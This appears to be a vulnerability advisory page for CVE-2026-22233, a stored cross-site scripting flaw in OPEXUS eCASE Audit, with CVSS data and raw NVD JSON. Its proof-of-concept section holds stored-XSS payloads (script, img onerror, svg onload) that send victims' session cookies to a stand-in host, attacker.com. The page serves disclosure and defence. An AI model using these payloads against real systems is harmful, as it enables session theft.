Security Vulnerability Report
CVE-2026-22233 CVSS 5.5 MEDIUM

CVE-2026-22233

Published: 2026-01-08 18:16:00
Last Modified: 2026-02-05 19:23:25
Source: 9119a7d8-5eab-497f-8521-727c672e3725

Description

OPEXUS eCASE Audit allows an authenticated attacker to save JavaScript as a comment in the "Estimated Staff Hours" field. The JavaScript is executed whenever another user visits the Project Cost tab. Fixed in OPEXUS eCASE Audit 11.14.2.0.

CVSS Details

CVSS Score: 5.5
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:L

Configurations (Affected Products)

cpe:2.3:a:opexustech:ecase_audit:*:*:*:*:*:*:*:* - VULNERABLE
OPEXUS eCASE Audit < 11.14.2.0

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
javascript
// CVE-2026-22233 PoC - Stored XSS in OPEXUS eCASE Audit
// Affected Field: Estimated Staff Hours
// Trigger: When other users visit Project Cost tab

// Step 1: Login to OPEXUS eCASE Audit with low-privilege account
const loginPayload = {
  username: 'attacker_account',
  password: 'password123'
};

// Step 2: Navigate to the form with Estimated Staff Hours field
// This typically involves accessing a project/cost entry form

// Step 3: Inject XSS payload in Estimated Staff Hours field
const xssPayload = '<script>fetch("https://attacker.com/steal?c="+document.cookie)</script>';
// Alternative payload examples:
// <img src=x onerror="fetch('https://attacker.com/steal?c='+document.cookie)">
// <svg/onload=fetch('https://attacker.com/steal?c='+document.cookie)>

// Step 4: Save the form - payload is stored in database
const savePayload = {
  estimatedStaffHours: xssPayload,
  // other form fields...
};

// Step 5: When victim visits Project Cost tab, XSS executes automatically
// Attacker receives victim's session cookie at their server

References

https://docs.opexustech.com/docs/oig/audit/eCase_Audit_Release_Notes_11.14.2.0.pdf (Release Notes)
https://raw.githubusercontent.com/cisagov/CSAF/develop/csaf_files/IT/white/2025/va-26-008-01.json (Broken Link)
https://www.cve.org/CVERecord?id=CVE-2026-22233 (Third Party Advisory)

Raw JSON Data

JSON
{
  "cve": {
    "id": "CVE-2026-22233",
    "sourceIdentifier": "9119a7d8-5eab-497f-8521-727c672e3725",
    "published": "2026-01-08T18:16:00.220",
    "lastModified": "2026-02-05T19:23:24.787",
    "vulnStatus": "Analyzed",
    "cveTags": [],
    "descriptions": [
      {
        "lang": "en",
        "value": "OPEXUS eCASE Audit allows an authenticated attacker to save JavaScript as a comment in the \"Estimated Staff Hours\" field. The JavaScript is executed whenever another user visits the Project Cost tab. Fixed in OPEXUS eCASE Audit 11.14.2.0."
      },
      {
        "lang": "es",
        "value": "OPEXUS eCASE Audit permite a un atacante autenticado guardar JavaScript como un comentario en el campo 'Horas de personal estimadas'. El JavaScript se ejecuta cada vez que otro usuario visita la pestaña 'Costo del proyecto'. Corregido en OPEXUS eCASE Audit 11.14.2.0."
      }
    ],
    "metrics": {
      "cvssMetricV40": [
        {
          "source": "9119a7d8-5eab-497f-8521-727c672e3725",
          "type": "Secondary",
          "cvssData": {
            "version": "4.0",
            "vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:A/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N/E:X/CR:X/IR:X/AR:X/MAV:X/MAC:X/MAT:X/MPR:X/MUI:X/MVC:X/MVI:X/MVA:X/MSC:X/MSI:X/MSA:X/S:X/AU:X/R:X/V:X/RE:X/U:X",
            "baseScore": 4.8,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "attackRequirements": "NONE",
            "privilegesRequired": "LOW",
            "userInteraction": "ACTIVE",
            "vulnConfidentialityImpact": "LOW",
            "vulnIntegrityImpact": "LOW",
            "vulnAvailabilityImpact": "LOW",
            "subConfidentialityImpact": "NONE",
            "subIntegrityImpact": "NONE",
            "subAvailabilityImpact": "NONE",
            "exploitMaturity": "NOT_DEFINED",
            "confidentialityRequirement": "NOT_DEFINED",
            "integrityRequirement": "NOT_DEFINED",
            "availabilityRequirement": "NOT_DEFINED",
            "modifiedAttackVector": "NOT_DEFINED",
            "modifiedAttackComplexity": "NOT_DEFINED",
            "modifiedAttackRequirements": "NOT_DEFINED",
            "modifiedPrivilegesRequired": "NOT_DEFINED",
            "modifiedUserInteraction": "NOT_DEFINED",
            "modifiedVulnConfidentialityImpact": "NOT_DEFINED",
            "modifiedVulnIntegrityImpact": "NOT_DEFINED",
            "modifiedVulnAvailabilityImpact": "NOT_DEFINED",
            "modifiedSubConfidentialityImpact": "NOT_DEFINED",
            "modifiedSubIntegrityImpact": "NOT_DEFINED",
            "modifiedSubAvailabilityImpact": "NOT_DEFINED",
            "Safety": "NOT_DEFINED",
            "Automatable": "NOT_DEFINED",
            "Recovery": "NOT_DEFINED",
            "valueDensity": "NOT_DEFINED",
            "vulnerabilityResponseEffort": "NOT_DEFINED",
            "providerUrgency": "NOT_DEFINED"
          }
        }
      ],
      "cvssMetricV31": [
        {
          "source": "9119a7d8-5eab-497f-8521-727c672e3725",
          "type": "Secondary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:U/C:L/I:L/A:L",
            "baseScore": 5.5,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "REQUIRED",
            "scope": "UNCHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "LOW"
          },
          "exploitabilityScore": 2.1,
          "impactScore": 3.4
        },
        {
          "source": "[email protected]",
          "type": "Primary",
          "cvssData": {
            "version": "3.1",
            "vectorString": "CVSS:3.1/AV:N/AC:L/PR:L/UI:R/S:C/C:L/I:L/A:N",
            "baseScore": 5.4,
            "baseSeverity": "MEDIUM",
            "attackVector": "NETWORK",
            "attackComplexity": "LOW",
            "privilegesRequired": "LOW",
            "userInteraction": "REQUIRED",
            "scope": "CHANGED",
            "confidentialityImpact": "LOW",
            "integrityImpact": "LOW",
            "availabilityImpact": "NONE"
          },
          "exploitabilityScore": 2.3,
          "impactScore": 2.7
        }
      ]
    },
    "weaknesses": [
      {
        "source": "9119a7d8-5eab-497f-8521-727c672e3725",
        "type": "Secondary",
        "description": [
          {"lang": "en", "value": "CWE-79"}
        ]
      }
    ],
    "configurations": [
      {
        "nodes": [
          {
            "operator": "OR",
            "negate": false,
            "cpeMatch": [
              {
                "vulnerable": true,
                "criteria": "cpe:2.3:a:opexustech:ecase_audit:*:*:*:*:*:*:*:*",
                "versionStartIncluding": "11.4.0",
                "versionEndExcluding": "11.14.2.0",
                "matchCriteriaId": "5A4D2029-9D59-4E65-B116-7405E4D37F4F"
              }
            ]
          }
        ]
      }
    ],
    "references": [
      {
        "url": "https://docs.opexustech.com/docs/oig/audit/eCase_Audit_Release_Notes_11.14.2.0.pdf",
        "source": "9119a7d8-5eab-497f-8521-727c672e3725",
        "tags": ["Release Notes"]
      },
      {
        "url": "https://raw.githubusercontent.com/cisagov/CSAF/develop/csaf_files/IT/white/2025/va-26-008-01.json",
        "source": "9119a7d8-5eab-497f-8521-727c672e3725",
        "tags": ["Broken Link"]
      },
      {
        "url": "https://www.cve.org/CVERecord?id=CVE-2026-22233",
        "source": "9119a7d8-5eab-497f-8521-727c672e3725",
        "tags": ["Third Party Advisory"]
      }
    ]
  }
}